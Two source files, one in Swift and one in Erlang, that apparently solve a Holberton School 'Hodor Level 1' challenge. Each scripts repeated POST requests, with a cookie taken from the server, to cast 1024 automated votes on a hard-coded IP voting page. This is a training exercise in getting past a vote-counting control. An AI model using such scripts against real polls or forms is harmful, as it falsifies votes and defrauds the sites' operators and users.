File: hodor/level_1/hodor1.swift

import Foundation

//===---Description:------------------------------------------------------------===//
// Swift script to solve Hodor Level 1 Project by Julien Barbier - Holberton
// School.
// by Alexandro de Oliveira.
// Working 100% ! ! ! (not Asyncronous yet, though)
//
// Next step is to create an iOS app to automatize the vote process...
// and be able to vote from anywhere! \o/ \o/ \o/
//===---XCode Playground:-------------------------------------------------------===//
// For the purpose of understand how the requests works it's interesting to
// test it in the XCode Playground.
// For that matter just add this two lines at the beginning of XCode Playground:
//
// > import XCPlaygroung
// > XCPlaygroundPage.currentPage.needsIndefiniteExecution = true
//
// ...and paste the code below in the Playground window.
//===---------------------------------------------------------------------------===//

//===---Function post()---------------------------------------------------------===//
// Function post used to make the http requests:
//===---------------------------------------------------------------------------===//
func post() {
    //Defining the URL to be requested:
    let url = NSURL(string: "http://173.246.108.142/level1.php")
    let cookie = getCookie()
    //Defining the POST request parameters:
    let param = "id=23&holdthedoor=Submit&key=" + cookie // To test it replace the "23" with your own id ;-)
    //Initializing the session:
    let session = NSURLSession.sharedSession()
    //The NSMutableURLRequest allow us to change its parameters later(header, values):
    let request = NSMutableURLRequest(URL: url!) //let request = NSURLRequest(URL: url!)
    //Defining the http Method:
    request.HTTPMethod = "POST"
    //Encoding the parameters to the HTTPBody.
    request.HTTPBody = param.dataUsingEncoding(NSUTF8StringEncoding)
    //Setting the headers:
    request.setValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
    request.setValue("havk64 - Swift Requests",  forHTTPHeaderField: "User-Agent") // Use your own User-Agent setting.
    request.setValue("HoldTheDoor=" + cookie, forHTTPHeaderField: "Cookie")
    //print(request.allHTTPHeaderFields!)
    let task = session.dataTaskWithRequest(request, completionHandler:
        { data, response, error -> Void in
            guard data != nil else {
                print("no data found: \(error)")
                return
            }
            // To print the http response uncomment the line below: << Response
            // print("Response: \(response)")

            // To print the response.Body(html) uncomment the two lines below: << Response Body
            // let strData = NSString(data: data!, encoding: NSUTF8StringEncoding)
            // print("Body: \(strData)")

        })
        // Making the request:
        task.resume()
    }
//===-----getCookie()-----------------------------------------------------------===//
// Function getCookie() for now just returns a valid cookie.
// Next step is to allow it to get a cookie from server and use it in each request.
//===---------------------------------------------------------------------------===//
func getCookie() -> String {
    return "990aede99b2115451d612b8c50ae6332a8026b62"
}

//Calling the function 1024 times.
for i in 0 ..< 1 {
    post()
    //usleep(200000) // <<< This is fundamental to compute the vote ! ! ! (It waits 200 milliseconds before the new request.)
    sleep(1)
}

print("BOOOOOOMMMM ! ! !") // A là Julien Barbier, hehe!

File: hodor/level_1/Erlang/hodor1.erl
%% ===-----Hodor Level 1---------------------------------------------===
%%          Hodor Level 1 Project, by Julien Barbier.
%%  "Make 1024 votes in this page: http://173.246.108.142/level1.php"
%%  Solution using Erlang code.
%%
%%  by Alexandro de Oliveira.
%% ===---------------------------------------------------------------===

-module(hodor1).
-export([main/0, for/2, posting/0]).

% Parsing the Cookie(I didn't find a specific function/method to parse the cookie or
%% a cookie session manager):
parse(A, S, I) ->
    T = string:tokens(A, S),
    lists:nth(I, T). %% In Erlang the last line is returned(we don't need to "return").
%% Getting one cookie with a HEAD request:
getCookie(URL) ->
    {ok,{ _,Headers, _}} = httpc:request(head, { URL, []}, [], []),
    C = proplists:get_value("set-cookie", Headers),
    Cookie = parse(C, ";", 1),
    parse(Cookie, "=", 2).

posting() ->
Method = post,
URL = "http://173.246.108.142/level1.php",
Cookie = getCookie(URL),
Header = [{"User-Agent","havk64 Erlang Requests"}, {"Cookie", "HoldTheDoor=" ++ Cookie}],
Type = "application/x-www-form-urlencoded",
Body = "id=23&holdthedoor=submit&key=" ++ Cookie,

httpc:request(Method, {URL, Header, Type, Body }, [], []),
io:fwrite(".").

for(0,_) ->
   [];
   for(N,Term) when N > 0 ->
   posting(),
   [Term|for(N-1,Term)].


main() ->
    ssl:start(),
    application:start(inets),
    for(1024, 1).
